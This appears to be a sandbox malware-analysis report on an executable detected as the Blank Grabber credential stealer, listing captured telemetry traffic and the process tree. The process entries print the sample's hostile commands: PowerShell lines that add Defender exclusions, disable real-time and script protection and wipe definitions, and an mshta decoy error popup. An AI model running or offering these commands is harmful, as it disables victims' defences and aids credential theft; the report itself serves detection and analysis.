                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      146192.168.2.45131213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:13 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182013Z-16849878b78j7llf5vkyvvcehs0000000awg00000000trqe
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      147192.168.2.45131113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:14 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 384d3f9c-b01e-003d-2424-26d32c000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182014Z-17c5cb586f62vrfquq10qybcuw00000002t000000000ntgq
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      148192.168.2.45131313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:13 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:14 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: a3f41134-c01e-00ad-7d0b-29a2b9000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182014Z-15b8d89586fcvr6p5956n5d0rc0000000g70000000002yck
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      149192.168.2.45131413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:14 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182014Z-16849878b78wc6ln1zsrz6q9w800000009p000000000358n
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                                      Start time:14:19:01
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\El9HaBFrFM.exe"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6ba3a0000
                                                                                                                                                                                                                                                                                                                      File size:8'278'102 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9500DA3F633857C71861D6AF33820C12
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                                                      Start time:14:19:01
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\El9HaBFrFM.exe"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6ba3a0000
                                                                                                                                                                                                                                                                                                                      File size:8'278'102 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9500DA3F633857C71861D6AF33820C12
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                                                                      Start time:14:19:04
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
